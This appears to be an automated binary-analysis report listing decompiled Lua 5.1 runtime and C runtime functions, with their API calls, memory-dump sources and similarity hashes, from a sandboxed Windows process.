0x00a2355f
0x00a23561
0x00a23562
0x00a23567
0x00a2356c
0x00a23583
0x00a23585
0x00a23587
0x00a23588
0x00a2358d
0x00a2358e
0x00a23593
0x00a23599
0x00a235b9
0x00a235b9
0x00a2359b
0x00a2359b
0x00a2359d
0x00a2359e
0x00a235a3
0x00a235a8
0x00000000
0x00a235aa
0x00a235aa
0x00a235ac
0x00a235ad
0x00a235b2
0x00a235b5
0x00a235b5
0x00a235a8
0x00a235be
0x00a235c0
0x00a235c1
0x00a235c6
0x00a235c9
0x00a235cd
0x00a235d1
0x00a235d3
0x00a235d7
0x00a235da
0x00a235dd
0x00a235e0
0x00a235e1
0x00a235e6
0x00a235e9
0x00a235ec
0x00a235d3
0x00a235f8
0x00a2356e
0x00a2356e
0x00a2356f
0x00a23582
0x00a23582

APIs

lua_type.LUA5.1(?,00000001), ref: 00A23562
lua_pushnil.LUA5.1(?), ref: 00A2356F
luaL_checktype.LUA5.1(?,00000001,00000002), ref: 00A23588
lua_gettop.LUA5.1(?,?,00000001,00000002), ref: 00A2358E
lua_type.LUA5.1(?,00000002), ref: 00A2359E
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A235AD
lua_touserdata.LUA5.1(?,00000001), ref: 00A235C1
lua_pushnumber.LUA5.1(?), ref: 00A235E1

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checktype.lua_gettop.lua_pushnil.lua_pushnumber.lua_touserdata.
String ID:
API String ID: 3663841464-0
Opcode ID: fcdca5ddcffba0ed5e57eb2b25bb2f9a075d72874a6020a88b95eced438d4245
Instruction ID: 1c0ef4d7fea41734e6a567139fba2bbc3e3edd3057fbc4f73d6b85c62c634646
Opcode Fuzzy Hash: fcdca5ddcffba0ed5e57eb2b25bb2f9a075d72874a6020a88b95eced438d4245
Instruction Fuzzy Hash: 38118663E1422026DE20365D7E83B7E72798B53B11F440179FE0999281F68A8B1511E3

Uniqueness

Uniqueness Score: -1.00%

Function 1000F840, Relevance: 12.1, APIs: 8, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000F840(signed int __ecx, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16) {
				char _v524;
				char* _t25;
				char* _t42;
				void* _t45;
				void* _t48;

				_t25 = _a12;
				asm("repne scasb");
				_t45 =  !(__ecx | 0xffffffff) - 1;
				_t31 = _a4;
				E1000FC00(_a4,  &_v524);
				_t39 = _a8;
				_t42 = strstr(_a8, _t25);
				_t48 =  &_v524 + 0x10;
				while(_t42 != 0) {
					E1000FAC0( &_v524, _t39, _t42 - _t39);
					_t31 = _a16;
					E1000FB10(_a16,  &_v524, _a16);
					_t39 = _t42 + _t45;
					_t42 = strstr(_t42 + _t45, _t25);
					_t48 = _t48 + 0x1c;
					_t51 = _t42;
				}
				E1000FB10(_t31,  &_v524, _t39);
				E1000FB40( &_v524);
				return E100016F0(_t51, _a4, 0xffffffff, 0);
			}

0x1000f84c
0x1000f858
0x1000f861
0x1000f863
0x1000f86c
0x1000f871
0x1000f880
0x1000f882
0x1000f887
0x1000f894
0x1000f899
0x1000f8a6
0x1000f8ab
0x1000f8b6
0x1000f8b8
0x1000f8bb
0x1000f8bb
0x1000f8c5
0x1000f8cf
0x1000f8f2

APIs

luaL_buffinit.LUA5.1(?,?), ref: 1000F86C
strstr.MSVCRT ref: 1000F87A
luaL_addlstring.LUA5.1(?,?,00000000), ref: 1000F894

Part of subcall function 1000FAC0: luaL_prepbuffer.LUA5.1(?,?,00000000,?,?,1000FB2D,?,?,?,?,1000F8CA,?,?), ref: 1000FAE5

strstr.MSVCRT ref: 1000F8B0
luaL_addstring.LUA5.1(?,?,?,?,00000000), ref: 1000F8A6

Part of subcall function 1000FB10: luaL_addlstring.LUA5.1(?,?,?,?,1000F8CA,?,?), ref: 1000FB28

luaL_addstring.LUA5.1(?,?), ref: 1000F8C5
luaL_pushresult.LUA5.1(?,?,?), ref: 1000F8CF
lua_tolstring.LUA5.1(?,000000FF,00000000,?,?,?), ref: 1000F8E0

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_addlstring.L_addstring.strstr$L_buffinit.L_prepbuffer.L_pushresult.lua_tolstring.
String ID:
API String ID: 1761298149-0
Opcode ID: 338a73e145920d4cbc4fd45a44107b012bb86aa1bd91e4dddec1b05471f5743b
Instruction ID: d206e32ecfd6e4e09133f94a8f78ac65a6508b9082a6392208b04d6cdd8a80bd
Opcode Fuzzy Hash: 338a73e145920d4cbc4fd45a44107b012bb86aa1bd91e4dddec1b05471f5743b
Instruction Fuzzy Hash: 31110A765043146BE220DBA4DC99EBF77ADEBC87A0F504A1CF95443286DB34E90587A1

Uniqueness

Uniqueness Score: -1.00%

Function 10013F20, Relevance: 12.1, APIs: 8, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013F20(void* __eflags, void* __fp0) {
				void* __ebx;
				void* _t5;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t22;

				_t27 = __fp0;
				_t24 = __eflags;
				_t15 =  *((intOrPtr*)(_t20 + 0x10));
				E1000F410(_t13, __eflags,  *((intOrPtr*)(_t20 + 0x10)), 1, 5);
				_t14 = E10001770(_t13, __eflags, _t15, 1);
				_t5 = E1000F600(_t24, __fp0, _t15, 2, _t14);
				_t21 = _t20 + 0x20;
				_t16 = _t5;
				if(_t14 != 0) {
					E10001C30(__eflags, __fp0, _t15, 1, _t16);
					_t22 = _t21 + 0xc;
					__eflags = _t16 - _t14;
					if(__eflags < 0) {
						_t2 = _t16 + 1; // 0x1
						_t18 = _t2;
						do {
							E10001C30(__eflags, _t27, _t15, 1, _t18);
							E10001EB0(__eflags, _t15, 1, _t16);
							_t22 = _t22 + 0x18;
							_t16 = _t16 + 1;
							_t18 = _t18 + 1;
							__eflags = _t16 - _t14;
						} while (__eflags < 0);
					}
					E100018C0(_t15);
					E10001EB0(__eflags, _t15, 1, _t14);
					return 1;
				} else {
					return 0;
				}
			}

0x10013f20
0x10013f20
0x10013f23
0x10013f2c
0x10013f39
0x10013f3f
0x10013f44
0x10013f47
0x10013f4b
0x10013f57
0x10013f5c
0x10013f5f
0x10013f61
0x10013f64
0x10013f64
0x10013f67
0x10013f6b
0x10013f74
0x10013f79
0x10013f7c
0x10013f7d
0x10013f7e
0x10013f7e
0x10013f82
0x10013f84
0x10013f8d
0x10013f9d
0x10013f4f
0x10013f52
0x10013f52

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 10013F2C

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_objlen.LUA5.1(?,00000001,?,00000001,00000005), ref: 10013F34
luaL_optinteger.LUA5.1(?,00000002,00000000,?,00000001,?,00000001,00000005), ref: 10013F3F

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

lua_rawgeti.LUA5.1(?,00000001,00000000), ref: 10013F57
lua_rawgeti.LUA5.1(?,00000001,00000001), ref: 10013F6B
lua_rawseti.LUA5.1(?,00000001,00000000,?,00000001,00000001), ref: 10013F74
lua_pushnil.LUA5.1(?), ref: 10013F84
lua_rawseti.LUA5.1(?,00000001,00000000,?), ref: 10013F8D

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_rawgeti.lua_rawseti.lua_type.$L_checktype.L_optinteger.lua_objlen.lua_pushnil.
String ID:
API String ID: 1053335798-0
Opcode ID: ce47c44e3921540d1a3f7d5192dff6f494b0ce31f91953d837c7f1b37d93e6a7
Instruction ID: e4767f20d85b55890ef67b6675474d1bc5294052240c8b0cc246a272151c2b31
Opcode Fuzzy Hash: ce47c44e3921540d1a3f7d5192dff6f494b0ce31f91953d837c7f1b37d93e6a7
Instruction Fuzzy Hash: A901D17EA5521432F221A1596CC3FFF122DCB82BD4F01402DFB1469083F687A99211E2

Uniqueness

Uniqueness Score: -1.00%

Function 004021D8, Relevance: 12.1, APIs: 8, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004021D8(void* __eax) {
				intOrPtr _t10;
				signed int _t11;
				int _t12;
				void* _t18;
				signed int _t27;
				signed int _t28;
				void* _t31;

				if(_t31 == 1) {
					_t10 =  *0x40003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t10 + 0x400000)) - 0x4550;
					if( *((intOrPtr*)(_t10 + 0x400000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t10 + 0x400018; // 0x8010b
						_t27 =  *_t2 & 0x0000ffff;
						__eflags = _t27 - 0x10b;
						if(_t27 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t10 + 0x400074)) - 0xe;
							if( *((intOrPtr*)(_t10 + 0x400074)) <= 0xe) {
								goto L1;
							} else {
								_t28 = 0;
								__eflags =  *(_t10 + 0x4000e8);
								goto L9;
							}
						} else {
							__eflags = _t27 - 0x20b;
							if(_t27 != 0x20b) {
								goto L1;
							} else {
								__eflags =  *((intOrPtr*)(_t10 + 0x400084)) - 0xe;
								if( *((intOrPtr*)(_t10 + 0x400084)) <= 0xe) {
									goto L1;
								} else {
									_t28 = 0;
									__eflags =  *(_t10 + 0x4000f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t11 = _t28 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t11 = 0;
				}
				 *0x40402c = _t11;
				_t12 = __set_app_type(2);
				__imp___encode_pointer(0xffffffff);
				 *0x404388 = _t12;
				 *0x40438c = _t12;
				 *(__p__fmode()) =  *0x404374;
				 *(__p__commode()) =  *0x404370;
				 *0x40437c =  *_adjust_fdiv;
				E004024CF();
				_t18 = E00401ECB();
				if( *0x404014 == 0) {
					__setusermatherr(E0040270D);
				}
				E004026E4(_t18);
				if( *0x404010 == 0xffffffff) {
					__imp___configthreadlocale(0xffffffff);
				}
				return 0;
			}

0x004021df
0x004021e5
0x004021ea
0x004021f4
0x00000000
0x004021f6
0x004021f6
0x004021f6
0x004021fd
0x00402203
0x00402220
0x00402227
0x00000000
0x00402229
0x00402229
0x0040222b
0x00000000
0x0040222b
0x00402205
0x00402205
0x0040220b
0x00000000
0x0040220d
0x0040220d
0x00402214
0x00000000
0x00402216
0x00402216
0x00402218
0x00402231
0x00402231
0x00402231
0x00402234
0x00402234
0x00402214
0x0040220b
0x00402203
0x004021e1
0x004021e1
0x004021e1
0x004021e1
0x00402238
0x0040223d
0x00402245
0x0040224d
0x00402252
0x00402263
0x00402271
0x0040227a
0x0040227f
0x00402284
0x00402290
0x00402297
0x0040229d
0x0040229e
0x004022aa
0x004022ae
0x004022b4
0x004022b7

APIs

__set_app_type.MSVCR80 ref: 0040223D
_encode_pointer.MSVCR80(000000FF), ref: 00402245
__p__fmode.MSVCR80 ref: 00402257
__p__commode.MSVCR80 ref: 00402265
__RTC_Initialize.LIBCMT ref: 0040227F
__setusermatherr.MSVCR80 ref: 00402297
__setdefaultprecision.LIBCMT ref: 0040229E
_configthreadlocale.MSVCR80(000000FF), ref: 004022AE

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize__p__commode__p__fmode__set_app_type__setdefaultprecision__setusermatherr_configthreadlocale_encode_pointer
String ID:
API String ID: 2053481123-0
Opcode ID: 880fea73b452a4cc2b6d3093691b10bde1a2118b03b96907f139e06825a78b96
Instruction ID: 4da86542026cdff693b3f0816fd03df2c0ae4235f1841574ee4596242521e34a
Opcode Fuzzy Hash: 880fea73b452a4cc2b6d3093691b10bde1a2118b03b96907f139e06825a78b96
Instruction Fuzzy Hash: 93211F70A01200DFDB689F74BF4CA2537A4A744326F10467FEA29B62E5DB784940DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 10013D80, Relevance: 12.1, APIs: 8, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10013D80(void* __ebx, void* __eflags, long long __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				long long _v12;
				void* _t11;
				void* _t16;
				void* _t17;
				signed char _t18;
				signed int _t24;
				void* _t27;
				void* _t29;
				long long _t35;

				_t35 = __fp0;
				_t30 = __eflags;
				_t22 = _a4;
				_v12 = 0;
				_v8 = 0;
				E1000F410(__ebx, __eflags, _a4, 1, 5);
				E100018C0(_t22);
				_t11 = E10002380(_t30, _t22, 1);
				_t27 = (_t24 & 0xfffffff8) - 0xc + 0x18;
				_t31 = _t11;
				if(_t11 == 0) {
					L6:
					E100018E0(_t22, _v12, _v8);
					return 1;
				} else {
					goto L1;
				}
				do {
					L1:
					E10001160(_t22, 0xfffffffe);
					_t16 = E10001410(_t31, _t22, 0xffffffff);
					_t29 = _t27 + 0x10;
					_t32 = _t16 - 3;
					if(_t16 == 3) {
						_t18 = E10001630(_t32, _t35, _t22, 0xffffffff);
						asm("fcom qword [esp+0x10]");
						_t29 = _t29 + 8;
						asm("fnstsw ax");
						_t33 = _t18 & 0x00000041;
						if((_t18 & 0x00000041) != 0) {
							st0 = _t35;
						} else {
							_v12 = _t35;
						}
					}
					_t17 = E10002380(_t33, _t22, 1);
					_t27 = _t29 + 8;
				} while (_t17 != 0);
				goto L6;
			}

0x10013d80
0x10013d80
0x10013d8a
0x10013d92
0x10013d9a
0x10013da2
0x10013da8
0x10013db0
0x10013db5
0x10013db8
0x10013dba
0x10013e01
0x10013e0c
0x10013e1d
0x00000000
0x00000000
0x00000000
0x10013dbc
0x10013dbc
0x10013dbf
0x10013dc7
0x10013dcc
0x10013dcf
0x10013dd2
0x10013dd7
0x10013ddc
0x10013de0
0x10013de3
0x10013de5
0x10013de8
0x10013df0
0x10013dea
0x10013dea
0x10013dea
0x10013de8
0x10013df5
0x10013dfa
0x10013dfd
0x00000000

APIs

luaL_checktype.LUA5.1 ref: 10013DA2

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_pushnil.LUA5.1(?), ref: 10013DA8
lua_next.LUA5.1(?,00000001,?), ref: 10013DB0
lua_settop.LUA5.1(?,000000FE,?,?,?,?,00000005), ref: 10013DBF
lua_type.LUA5.1(?,000000FF,?,000000FE,?,?,?,?,00000005), ref: 10013DC7
lua_tonumber.LUA5.1(?,000000FF,?,?,?,?,?,?,?,?,00000005), ref: 10013DD7
lua_next.LUA5.1(?,00000001,?,?,?,?,?,?,?,?,00000005), ref: 10013DF5
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,00000005), ref: 10013E0C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_next.lua_type.$L_checktype.lua_pushnil.lua_pushnumber.lua_settop.lua_tonumber.
String ID:
API String ID: 1287351551-0
Opcode ID: 565239a361d6a00f1c2ab8226bd8f35c36dbe8d9e55731978c449288ab07e6c3
Instruction ID: 117c92ce3279ffc3b84bb6b345daa2d5c6a92653072d93aa6f5c61928671eea2
Opcode Fuzzy Hash: 565239a361d6a00f1c2ab8226bd8f35c36dbe8d9e55731978c449288ab07e6c3
Instruction Fuzzy Hash: 7801F57851462232EA00E618AC43BCF378CDF023E4F004714F8246A2C6EBB6F79542EB

Uniqueness

Uniqueness Score: -1.00%

Function 10014360, Relevance: 12.0, APIs: 8, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014360(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t6;
				void* _t15;

				_t24 = _a4;
				_t6 = E10001410(__eflags, _a4, 2);
				_t30 = _t6;
				if(_t6 == 0) {
					return E100015E0(__eflags, _t24, _a8, _a12);
				} else {
					E100013D0(_t30, _t24, 2);
					E100013D0(_t30, _t24, _a8 - 1);
					E100013D0(_a12 + 0xfffffffe, _t24, _a12 + 0xfffffffe);
					E10002070(_t24, 2, 1);
					_t15 = E100016C0(_a12 + 0xfffffffe, _t24, 0xffffffff);
					E10001160(_t24, 0xfffffffe);
					return _t15;
				}
			}

0x10014361
0x10014368
0x10014370
0x10014372
0x100143cf
0x10014374
0x10014378
0x10014384
0x10014392
0x1001439c
0x100143a4
0x100143ae
0x100143ba
0x100143ba

APIs

lua_type.LUA5.1(?,00000002,?,1001412A,?,000000FF,000000FE,?,00000001,?,?,00000001,00000000,00000000,?), ref: 10014368
lua_pushvalue.LUA5.1(?,00000002,00000000,?,00000002), ref: 10014378
lua_pushvalue.LUA5.1(?,?,?,00000002,00000000,?,00000002), ref: 10014384
lua_pushvalue.LUA5.1(?,?,?,?,?,00000002,00000000,?,00000002), ref: 10014392
lua_call.LUA5.1(?,00000002,00000001,?,?,?,?,?,00000002,00000000,?,00000002), ref: 1001439C
lua_toboolean.LUA5.1(?,000000FF,?,00000002,00000001,?,?,?,?,?,00000002,00000000,?,00000002), ref: 100143A4
lua_settop.LUA5.1(?,000000FE,?,000000FF,?,00000002,00000001,?,?,?,?,?,00000002,00000000,?,00000002), ref: 100143AE
lua_lessthan.LUA5.1(?,?,?,?,00000002), ref: 100143C6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushvalue.$lua_call.lua_lessthan.lua_settop.lua_toboolean.lua_type.
String ID:
API String ID: 2401761019-0
Opcode ID: 6f3a85a28c72f52ad4c60697e63935109777475e69e9e63b4488931b5e6b07aa
Instruction ID: f37ed43eb66feff067031fa0ff8b63f19d5026bc2296c18d9aacc712a1e8c1f6
Opcode Fuzzy Hash: 6f3a85a28c72f52ad4c60697e63935109777475e69e9e63b4488931b5e6b07aa
Instruction Fuzzy Hash: 75F0967960962076F405D625BC03FEF228DCFC27E0F044614F521A62DADAA4BE4242F6

Uniqueness

Uniqueness Score: -1.00%

Function 10011A80, Relevance: 12.0, APIs: 8, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011A80(void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t4;
				void* _t14;

				_t14 = __eflags;
				_t10 = _a4;
				E10001B10(_a4, 0x10017648);
				E10001BF0(_t14, __fp0, _a4, 0xffffd8f0);
				_t4 = E10001410(_t14, _t10, 0xffffffff);
				_t15 = _t4 - 5;
				if(_t4 != 5) {
					E10001160(_t10, 0xfffffffe);
					E10001C70(_t10, 0, 1);
					E10001B10(_t10, 0x10017648);
					E100013D0(_t15, _t10, 0xfffffffe);
					return E10001E40(_t15, _t10, 0xffffd8f0);
				}
				return _t4;
			}

0x10011a80
0x10011a81
0x10011a8b
0x10011a96
0x10011a9e
0x10011aa6
0x10011aa9
0x10011aae
0x10011ab8
0x10011ac3
0x10011acb
0x00000000
0x10011adb
0x10011adf

APIs

lua_pushlightuserdata.LUA5.1(?,10017648,?,1001196C,00000000,?,?,?,00000000), ref: 10011A8B
lua_rawget.LUA5.1(?,FFFFD8F0,?,10017648,?,1001196C,00000000,?,?,?,00000000), ref: 10011A96
lua_type.LUA5.1(?,000000FF,?,FFFFD8F0,?,10017648,?,1001196C,00000000,?,?,?,00000000), ref: 10011A9E
lua_settop.LUA5.1(?,000000FE,?,?,?,?,?,?,1001196C,00000000,?,?,?,00000000), ref: 10011AAE
lua_createtable.LUA5.1(?,00000000,00000001,?,000000FE,?,?,?,?,?,?,1001196C,00000000), ref: 10011AB8
lua_pushlightuserdata.LUA5.1(?,10017648,?,00000000,00000001,?,000000FE,?,?,?,?,?,?,1001196C,00000000), ref: 10011AC3
lua_pushvalue.LUA5.1(?,000000FE,?,10017648,?,00000000,00000001,?,000000FE,?,?,?,?,?,?,1001196C), ref: 10011ACB
lua_rawset.LUA5.1(?,FFFFD8F0,?,000000FE,?,10017648,?,00000000,00000001,?,000000FE), ref: 10011AD6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushlightuserdata.$lua_createtable.lua_pushvalue.lua_rawget.lua_rawset.lua_settop.lua_type.
String ID:
API String ID: 830569787-0
Opcode ID: c4a833b71fad81a465659c275be94d546d7c7bf6ee61b119b81f57ffaafa61b1
Instruction ID: 9da9c725d365500a5c8fba25e70757e5b7f6bdc413e1489834bdb64db820be75
Opcode Fuzzy Hash: c4a833b71fad81a465659c275be94d546d7c7bf6ee61b119b81f57ffaafa61b1
Instruction Fuzzy Hash: AFE0123998A93231E802F2282C12FCE210ACF031E0F610710F225351EB6F59B6D281EF

Uniqueness

Uniqueness Score: -1.00%

Function 00993A50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00993A50(void* __ecx, void* __eflags, void* __fp0, char _a4, intOrPtr _a8200) {
				char _v0;
				void* _t9;
				void* _t12;
				void* _t17;
				intOrPtr _t21;
				void* _t24;
				void* _t35;

				_t35 = __fp0;
				E00994BE0(0x2004, __ecx);
				_t21 = _a8200;
				_t9 = E00991250(_t21, "udp{any}", 1);
				_push(0x40c00000);
				_push(0);
				_push(2);
				_push(_t21);
				_t17 = _t9;
				L00994B72();
				L00994BD0();
				_t22 = _t9;
				_t2 = _t17 + 8; // 0x8
				_t24 = _t2;
				if(_t9 >= 0x2000) {
					_t22 = 0x2000;
				}
				E00992DC0(_t35, _t24);
				_push(_t24);
				_t12 = E00994520(_t17,  &_a4, _t22,  &_v0);
				_t23 = _t12;
				if(_t12 == 0) {
					_push(_v0);
					_push( &_a4);
					_push(_t21);
					L00994BC6();
					return 1;
				} else {
					_push(_t21);
					L00994B4E();
					_push(E00993860(_t23));
					_push(_t21);
					L00994AD0();
					return 2;
				}
			}

0x00993a50
0x00993a55
0x00993a5e
0x00993a6d
0x00993a72
0x00993a77
0x00993a79
0x00993a7b
0x00993a7c
0x00993a7e
0x00993a86
0x00993a8b
0x00993a8d
0x00993a8d
0x00993a96
0x00993a98
0x00993a98
0x00993a9e
0x00993aa7
0x00993ab0
0x00993ab5
0x00993abc
0x00993aec
0x00993aed
0x00993aee
0x00993aef
0x00993b06
0x00993abe
0x00993abe
0x00993abf
0x00993aca
0x00993acb
0x00993acc
0x00993ae3
0x00993ae3

APIs

Part of subcall function 00991250: sprintf.MSVCRT ref: 0099127F
Part of subcall function 00991250: luaL_argerror.LUA5.1(?,?,?), ref: 0099128C

luaL_optnumber.LUA5.1(?,00000002,00000000,40C00000,?,udp{any},00000001), ref: 00993A7E
_ftol.MSVCRT ref: 00993A86
lua_pushnil.LUA5.1(?), ref: 00993ABF
lua_pushstring.LUA5.1(?,00000000,00000000,?), ref: 00993ACC
lua_pushlstring.LUA5.1(?,?,?), ref: 00993AEF

Strings

udp{any}, xrefs: 00993A67

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_optnumber._ftollua_pushlstring.lua_pushnil.lua_pushstring.sprintf
String ID: udp{any}
API String ID: 1991399662-1792101638
Opcode ID: d52c7fb6ac8f1863ac9992bbf8e34ae5bc9e9f17ba08013107996cdefa3269cf
Instruction ID: e7adfff059ccde8ab65aca67f0123f02e6f3aed353fd8f7ffbedd404742b30aa
Opcode Fuzzy Hash: d52c7fb6ac8f1863ac9992bbf8e34ae5bc9e9f17ba08013107996cdefa3269cf
Instruction Fuzzy Hash: 7E012B7260121437EA21765CACC6FBF735CCBC1715F040075FA0866143E60EAD0682F6

Uniqueness

Uniqueness Score: -1.00%

Function 00401180, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401180(void* __ebx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _t20;
				void* _t29;
				signed int _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t38;
				void* _t39;

				_t29 = __ebx;
				_t36 = _a4;
				_t35 = 0;
				if( *_t36 != 0) {
					do {
						_t35 = _t35 + 1;
					} while ( *((intOrPtr*)(_t36 + _t35 * 4)) != 0);
				}
				_t32 = _a8;
				_t20 = _t35 - _t32 - 1;
				_a4 = _t20;
				_push("too many arguments to script");
				_push(_t20 + 3);
				_push(_t29);
				L00401F48();
				_t33 = _t32 + 1;
				_t38 = _t37 + 0xc;
				while(_t33 < _t35) {
					_push( *((intOrPtr*)(_t36 + _t33 * 4)));
					_push(_t29);
					L00401ED0();
					_t33 = _t33 + 1;
					_t38 = _t38 + 8;
				}
				_push(_a8 + 1);
				_push(_a4);
				_push(_t29);
				L00401F42();
				_t39 = _t38 + 0xc;
				_t34 = 0;
				if(_t35 > 0) {
					_a8 =  ~_a8;
					do {
						_push( *((intOrPtr*)(_t36 + _t34 * 4)));
						_push(_t29);
						L00401ED0();
						_push(_a8);
						_push(0xfffffffe);
						_push(_t29);
						L00401F2A();
						_a8 = _a8 + 1;
						_t34 = _t34 + 1;
						_t39 = _t39 + 0x14;
					} while (_t34 < _t35);
				}
				return _a4;
			}

0x00401180
0x00401181
0x00401186
0x0040118c
0x00401190
0x00401190
0x00401193
0x00401190
0x0040119a
0x004011a2
0x004011a5
0x004011a9
0x004011b1
0x004011b2
0x004011b3
0x004011b8
0x004011bb
0x004011c0
0x004011c6
0x004011c7
0x004011c8
0x004011cd
0x004011d0
0x004011d3
0x004011e2
0x004011e3
0x004011e4
0x004011e5
0x004011ea
0x004011ed
0x004011f1
0x004011f9
0x00401200
0x00401204
0x00401205
0x00401206
0x0040120f
0x00401210
0x00401212
0x00401213
0x00401218
0x0040121d
0x00401220
0x00401223
0x00401200
0x0040122e

APIs

luaL_checkstack.LUA5.1(?,-00000004,too many arguments to script), ref: 004011B3
lua_pushstring.LUA5.1(?,00000000), ref: 004011C8
lua_createtable.LUA5.1(?,?,?), ref: 004011E5
lua_pushstring.LUA5.1 ref: 00401206
lua_rawseti.LUA5.1(?,000000FE,?), ref: 00401213

Strings

too many arguments to script, xrefs: 004011A9

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$L_checkstack.lua_createtable.lua_rawseti.
String ID: too many arguments to script
API String ID: 2655701096-3431356383
Opcode ID: d86e069ce187896570404189fd49b1180934dc9683d429a05b637f5348acb865
Instruction ID: b3c63d2026db90fbba0a654190171efed84ab46bd67734b3e42b2b2c93a13a7e
